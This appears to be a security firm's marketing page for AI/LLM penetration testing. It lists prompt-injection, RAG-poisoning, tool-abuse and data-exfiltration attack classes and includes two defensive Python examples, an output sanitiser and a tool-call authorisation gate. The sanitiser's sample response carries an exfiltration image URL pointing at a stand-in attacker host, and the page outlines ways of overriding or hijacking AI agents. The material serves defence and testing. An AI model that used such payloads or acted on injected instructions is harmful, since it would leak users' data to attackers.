AI / LLM security assessment

Test the agent before it lies for you.

We find what your AI agent will do for an attacker, and prove it. AI pentesters test your chatbot, RAG search, and tool-calling agent by hand. Every weakness arrives with a working exploit, the exact code change to fix it, and a re-test after you patch.

Why now

The window from vulnerability discovery to exploitation has gone from weeks to hours.

Trusted by security teams across Fintech, SaaS & Education, Enterprise & Telecom, Security & Critical Infrastructure

Airbase
Quiltt
Pacvue
Imagine Learning

On record

Same accreditations on every engagement.

CREST is the standard for offensive security execution. CERT-In, SOC 2 Type II, and ISO/IEC 27001 cover how SecureLayer7 handles your prompts, your model artifacts, and your engagement record.

  • APRA CPS 234
    Prudential standard · information security
  • ASD Essential 8
    Australian Signals Directorate maturity model
  • IRAP
    Info-Security Registered Assessors Program
  • CREST accredited
    Tester accreditation
  • AICPA SOC 2 Type II
    AICPA · TSC controls auditable

Adversarial by hand.

We cross-examine the model the way an attacker would.

Prompt injection doesn't show up in request shape or code paths. It shows up when a document tells your model to email a user's data out, and the model does it. Our AI pentesters run adversarial conversations against your real agent, chatbot, RAG search, and tool-calling stack, and show you exactly what they give up.

How we use AI in our pentest engagements
Five-step chain: a SAFE-marked input becomes a doc, then an agent, then a tool, then a leak, showing how a passing scanner result still hands an attacker a data-exfil path through the agent.

Pick the engagement

Three ways we test AI. Pick by what you ship.

Every engagement is threat-modelled to your real surface: chat app, agent stack, or model artifact. Bug classes from the OWASP LLM Top 10 are exercised inside the mode that matches what you actually run in production.

01

LLM Application Pentest

Chat UIs, RAG-backed search, and AI features inside a SaaS, exercised from scoping to re-test. Direct + indirect prompt injection, system-prompt leakage, insecure output handling (XSS via markdown, RCE via eval'd code blocks, SSRF via rendered URLs). Tested against your real prompts and your real RAG corpus.
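The output-handling classes named above (XSS via markdown, RCE via eval'd code blocks, SSRF or data exfiltration via rendered URLs) share one root cause: the renderer treats model text as trusted markup. The guard below is an added illustration of the defender's side, not SecureLayer7's code or a tool from any engagement. It treats every response as untrusted input: HTML is escaped, markdown images are never fetched (an auto-loaded image URL leaks whatever the model puts in the query string without a click), links survive only when the host is on an allowlist, and fenced code blocks are handed back as inert data for display rather than to any eval. The allowlist, the sample response and the regexes are constructed for the example.

```python
"""Output-handling guard for LLM responses. Added example, not SecureLayer7
code. Model text is untrusted input to the renderer: escape HTML, drop images
(zero-click exfil channel), keep links only for allowlisted https hosts, and
return fenced code as data that is displayed, never executed."""
import html
import re
from urllib.parse import urlparse

# Hosts the UI may link to; constructed for the example.
ALLOWED_LINK_HOSTS = {"docs.example.com", "support.example.com"}

FENCE = re.compile(r"```[^\n]*\n(.*?)```", re.S)          # ```lang\n...```
MD_IMAGE = re.compile(r"!\[([^\]]*)\]\(([^)\s]+)[^)]*\)")  # ![alt](url)
MD_LINK = re.compile(r"\[([^\]]*)\]\(([^)\s]+)[^)]*\)")    # [label](url)


def host_allowed(url: str) -> bool:
    """Only https links to allowlisted hosts are rendered as clickable."""
    p = urlparse(url)
    return p.scheme == "https" and p.hostname in ALLOWED_LINK_HOSTS


def render_safe(model_text: str):
    """Return (safe_html, blocked_urls, code_blocks) for one model response.

    blocked_urls is a detection signal: a response that tries to render a
    URL outside the allowlist is worth logging as a possible injection.
    """
    blocked: list = []
    code_blocks: list = []

    def take_code(m):
        code_blocks.append(m.group(1))          # shown to the user as text later
        return f"[code block {len(code_blocks)} withheld from renderer]"

    def drop_image(m):
        blocked.append(m.group(2))              # URL is recorded, never fetched
        return m.group(1)                       # alt text only

    text = FENCE.sub(take_code, model_text)
    text = MD_IMAGE.sub(drop_image, text)       # must run before MD_LINK

    out, pos = [], 0
    for m in MD_LINK.finditer(text):
        out.append(html.escape(text[pos:m.start()]))   # prose between links
        label, url = m.group(1), m.group(2)
        if host_allowed(url):
            out.append(
                f'<a href="{html.escape(url)}" rel="noopener noreferrer">'
                f"{html.escape(label)}</a>"
            )
        else:
            blocked.append(url)
            out.append(html.escape(label))             # keep the words, drop the URL
        pos = m.end()
    out.append(html.escape(text[pos:]))
    return "".join(out), blocked, code_blocks


# Constructed model response carrying an injected exfil image, an
# off-allowlist link, raw HTML and a code block.
SAMPLE_RESPONSE = (
    "Here is the summary you asked for.\n"
    "![](https://attacker.example/c?d=QUFB)\n"
    "See [the docs](https://docs.example.com/guide) or "
    "[click here](http://evil.example/login).\n"
    "<script>alert(1)</script>\n"
    "```python\nprint('hi')\n```\n"
)

if __name__ == "__main__":
    safe_html, blocked_urls, code = render_safe(SAMPLE_RESPONSE)
    print(safe_html)
    print("blocked:", blocked_urls)
    print("code blocks:", code)
```

The `blocked` list is what a detection team wants: one log line per response that attempted to render an off-allowlist URL, with the URL itself, is a cheap indicator of indirect injection landing in production.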

Chat UI with a malicious payload smuggled into a RAG document; model in the middle; output bubble shows PII leaked in the response.
Agent at the centre with four tool spokes; the send_email spoke is highlighted orange and a travelling dot moves out, illustrating tool-call abuse.
Four-stage training pipeline (data, train, weights, load) with a tampered fine-tune dropping in at the weights stage and the registry-load step highlighted orange.

LLM AGENT ATTACK SURFACE.

Seven attack classes the buyer rarely sees in a scanner readout.

  1. Prompt injection
     Direct user-input attacks that override the agent's system prompt.
  2. Indirect injection
     Hostile content slipped through RAG documents or tool output.
  3. RAG-store poisoning
     Tainted vector-store entries that flip the model's grounded facts.
  4. Tool-call confusion
     Function-call hijacking and parameter tampering on agent actions.
  5. Identity spoofing
     Agent impersonation across multi-agent or multi-tenant chains.
  6. Output exfiltration
     Stealing secrets, PII, or schema through carefully shaped responses.
  7. Plan hijacking
     Multi-step reasoning chains subverted mid-execution by adversarial input.

What we test

Six attack vectors. One engagement.

Every AI/LLM engagement covers the OWASP LLM Top 10 mapped to your real surface: model, prompt, RAG, tools, output, agent, supply chain. Threat-modelled to your application; exercised against named bug classes.

  • Direct prompt injection (LLM01)
    User-supplied input that overrides the system prompt: role-play, refusal bypass, multi-turn pivots, instruction stacking, character-encoding tricks. Tested across every entry point that reaches the model.
  • Indirect prompt injection (LLM01)
    Adversarial instructions hidden in retrieved documents, tool outputs, web pages, email threads, and calendar invites. The agent reads them as instructions and acts on them; the user never sees the prompt.
  • Insecure output handling (LLM02)
    Generated content rendered without sanitisation: XSS via markdown, RCE via downstream eval, SSRF via tool-rendered URLs, prompt-induced response smuggling into auth-protected paths.
  • Excessive agency / tool abuse (LLM08)
    Tool / function calling exploited to send email, write to databases, execute code, or move money. We test the agent's authority limits, scope checks, and human-in-the-loop gates.
  • Sensitive info disclosure (LLM06)
    System-prompt leakage, training-data extraction, model inversion through targeted queries, embedding inversion, conversational memory leakage across users / tenants.
  • Supply chain + model integrity (LLM05)
    Compromised model weights, unsafe pickle deserialisation in PyTorch / safetensors, tampered fine-tunes, hijacked HF / model-registry pulls, malicious adapter / LoRA loading.
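The excessive-agency item above lists three controls a tester probes: authority limits, scope checks, and human-in-the-loop gates. The following Python gate is an added example of what those three look like in code; it is not SecureLayer7's tooling or any client's agent, and the tool names (`search_docs`, `send_email`, `transfer_funds`), permission strings, tenant model and approval key are constructed. The design point is that nothing in the model's output confers authority: the agent can do no more than the authenticated user behind the conversation, arguments are checked against that user's scope before execution, and a high-risk call runs only with an operator approval bound to that exact call, so an approval cannot be replayed against a modified one.

```python
"""Tool-call authorisation gate for an LLM agent. Added example, not
SecureLayer7 code. Every function call the model proposes passes through
authorise() before anything executes: the tool must be registered, the end
user must hold the tool's permission, the arguments must stay inside that
user's scope, and high-risk tools need an operator approval for this call.
Tool names, permission names and the tenant model are constructed."""
import hashlib
import hmac
import json
from dataclasses import dataclass
from enum import Enum
from typing import Callable, Optional

# Server-side secret for approval tokens; constructed placeholder.
APPROVAL_KEY = b"replace-with-a-secret-from-your-kms"


class Decision(Enum):
    ALLOW = "allow"
    DENY = "deny"
    NEEDS_APPROVAL = "needs_human_approval"


@dataclass(frozen=True)
class Caller:
    """The authenticated user behind the conversation, never the model."""
    user_id: str
    tenant_domain: str        # e.g. "acme.example"; bounds where mail may go
    permissions: frozenset    # the agent inherits exactly this, no more
    daily_limit: float = 0.0  # payment ceiling for this user


@dataclass(frozen=True)
class ToolSpec:
    permission: str
    high_risk: bool = False
    # Returns a reason string when the arguments fall outside the caller's scope.
    scope_check: Optional[Callable[[Caller, dict], Optional[str]]] = None


def same_tenant_recipient(caller: Caller, args: dict) -> Optional[str]:
    to = str(args.get("to", ""))
    if not to.endswith("@" + caller.tenant_domain):
        return f"recipient {to!r} is outside tenant {caller.tenant_domain!r}"
    return None


def within_daily_limit(caller: Caller, args: dict) -> Optional[str]:
    amount = float(args.get("amount", 0))
    if amount <= 0 or amount > caller.daily_limit:
        return f"amount {amount} exceeds limit {caller.daily_limit}"
    return None


# Hypothetical registry for the example agent.
REGISTRY = {
    "search_docs": ToolSpec("docs:read"),
    "send_email": ToolSpec("mail:send", high_risk=True,
                           scope_check=same_tenant_recipient),
    "transfer_funds": ToolSpec("payments:write", high_risk=True,
                               scope_check=within_daily_limit),
}


def approval_token(caller: Caller, call: dict) -> str:
    """Operator side: approve exactly this call for exactly this user."""
    canon = json.dumps({"user": caller.user_id, "call": call}, sort_keys=True)
    return hmac.new(APPROVAL_KEY, canon.encode(), hashlib.sha256).hexdigest()


def authorise(caller: Caller, call: dict, token: Optional[str] = None):
    """Decide on a model-proposed call {"name": ..., "arguments": {...}}."""
    name = call.get("name")
    args = call.get("arguments") or {}
    spec = REGISTRY.get(name)
    if spec is None:
        return Decision.DENY, f"unknown tool {name!r}"
    if spec.permission not in caller.permissions:           # authority limit
        return Decision.DENY, f"caller lacks {spec.permission}"
    if spec.scope_check is not None:                          # scope check
        reason = spec.scope_check(caller, args)
        if reason:
            return Decision.DENY, reason
    if spec.high_risk:                                        # human-in-the-loop gate
        expected = approval_token(caller, call)
        if token is None or not hmac.compare_digest(token, expected):
            return Decision.NEEDS_APPROVAL, "operator approval required for this call"
    return Decision.ALLOW, "ok"


if __name__ == "__main__":
    # Constructed user: may read docs and send mail, no payment rights.
    user = Caller("u-1", "acme.example", frozenset({"docs:read", "mail:send"}))
    injected = {"name": "send_email",
                "arguments": {"to": "drop@outside.example", "body": "..."}}
    print(authorise(user, injected))   # DENY: recipient outside tenant
```

Every DENY and NEEDS_APPROVAL carries its reason, which is the line to ship to the SIEM: a burst of out-of-tenant recipients or unknown tool names from one conversation is the operational signature of an injection attempt against the agent.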

AI/LLM METHODOLOGY.

Eight phases. Adversarial.

Threat-modelled to your model choice, system prompt, RAG corpus, and agent topology. Not a template we run against every chatbot.

  1. Scope & threat-model
  2. Recon & enumeration
  3. Direct prompt injection
  4. Indirect prompt injection
  5. Output handling abuse
  6. Tool-call abuse
  7. Model & data extraction
  8. Remediation & re-test

AI pentester credentials

Same pentester behind our published CVE research.

Our AI/LLM testing team comes from the offensive-security practice that filed the CVEs in our security advisories. AI surfaces are tested by people who already carry the credentials buyers ask procurement to verify on every web, API, and cloud engagement.

  • Offensive Security Certified Professional
  • Offensive Security Web Expert
  • Offensive Security Experienced Penetration Tester
  • Offensive Security Certified Expert
  • GIAC Penetration Tester
  • GIAC Web Application Penetration Tester
  • GIAC Exploit Researcher and Advanced Penetration Tester
  • Certified Information Systems Security Professional (ISC2)
  • Certified Ethical Hacker (EC-Council)
  • Certified Red Team Operator (Zero-Point Security)
  • Certified Red Team Professional (Altered Security)
  • CREST (Council of Registered Ethical Security Testers)

Meet our expert

One named lead on every AI/LLM engagement.

John Dill

vCISO at SecureLayer7

15+

Years in offensive security

150+

Engagements led to date

99.99%

On-time engagement delivery

John scopes AI/LLM engagements against your model, system prompt, RAG corpus, and agent topology. He guides the pod from kick-off through final report and re-test.

  • Scopes chat, agent, and RAG engagements against your real risk model.
  • Owns kick-off, mid-engagement check-ins, and live walkthrough of every prompt-injection finding.
  • Drives remediation review and re-test until every agent and tool path is closed.

Ready to scope an AI/LLM pentest? Book 30 minutes with John to walk through your model, prompts, agents, and timeline.

Book a 30-min call

For startups

Pre-Series A? Apply for the startup program.

A single autonomous app pentest: CREST-aligned report, engagement-lead sign-off, re-test included, heavily discounted for pre-Series A startups passing enterprise procurement or SOC 2 due diligence. Eligibility verified on application.

Apply for the startup program

Tested by industry.

The bug classes named below come from real engagements in each sector. Pick the closest fit.

Tech SaaS

Customer-facing copilots, internal agents, cross-tenant retrieval boundaries.

HealthTech

Clinical scribes, patient chatbots, PHI exfil chains, over-prescription manipulation.

FinTech

KYC copilots, support chatbots, prompt-injection paths through bank tenant data.

Built for Australia engagements

What changes when we deliver here.

  • Regulatory framework

    APP 8 destination ledger per model endpoint

  • Compliance scoping

    APP 11 grading on training + embedding store

  • Local engagements

    AU bank assistant — 9 injection paths closed

  • Local pricing

    AUD per-model fixed-fee, GST itemised

  • Compliance scoping

    ASD / ACSC AI guidance section per finding

Questions Australian AI product teams ask first.

  • Do you cite the ASD voluntary AI guidance?

    Yes. The ASD / ACSC engaging-with-AI and securing-AI guidance is referenced on threat-model findings. Each control gap cites the relevant section.

  • How are APP 8 cross-border issues flagged?

    Every model and vector-store endpoint is logged with destination country. APP 8 disclosure risk is flagged when inference or training data leaves AU.

  • What attack types do you cover?

    Direct + indirect prompt injection, training-data extraction, output handling, model DoS, and supply-chain integrity. OWASP LLM Top 10 IDs are cited per finding.

  • Will the report help a Privacy Impact Assessment?

    Yes. OAIC PIA template fields are pre-filled from the findings. Useful evidence for an APP 11 and NDB-aware AI rollout.

Delivery in Australia

APP 8 + APP 11. ASD ISM AI.

Prompt injection, jailbreak, and data-leak paths are tested. APP 8 cross-border findings list the model host country. APP 11 reasonable steps cover training-data and embedding stores.

Direct line
+61-2-0000-0000
Office
Sydney, Australia

Frameworks scoped: ASD Essential 8 · APRA CPS 234 · Privacy Act · ISO/IEC 27001.

Sample AI/LLM pentest report, kill-chain · evidence · remediation

Sample engagement report

See what arrives in your inbox.

A pre-vetted sample report: full kill chain, working prompt-injection PoCs, code-level fix guidance, and re-test scope. Sent on request after a 5-minute scoping call.